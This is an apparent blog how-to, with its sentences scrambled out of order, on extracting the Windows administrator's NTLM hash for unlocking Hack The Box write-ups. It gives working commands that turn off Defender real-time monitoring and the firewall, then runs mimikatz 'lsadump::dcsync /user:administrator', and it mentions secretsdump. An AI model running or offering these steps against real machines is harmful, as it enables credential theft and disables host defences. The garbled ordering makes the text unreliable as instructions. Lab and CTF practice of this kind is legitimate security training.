Decode ntlm hash4/7/2024 User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD ) 'administrator' will be the user account Mimikatz(commandline) # lsadump::dcsync /user:administrator # / \ # /*** Benjamin DELPY `gentilkiwi` ( ) mimikatz.exe "lsadump::dcsync /user:administrator" You will get an output like this: C:\tmp>. Then run mimikatz with the following arguments. Then disable the Anti-Virus protection: netsh advfirewall set currentprofile state off Using mimikatzĪfter getting a shell as administrator you can follow the steps below to extract the NTLM hash.įirst disable the real time protection if its enabled: Set-MpPreference -DisableRealtimeMonitoring $true In the second example I show you how to use secretdump for it. In this How-To post I will show you how you can extract the NTLM hash of the administrator user (probably for any user) on windows machines.Īt first we will use mimikatz. Preface: If you want to decrypt a writeup for an active windows box on HTB or from other plattforms using the NTLM hash of the administartor user, you are on the right place.
0 Comments
Leave a Reply.AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |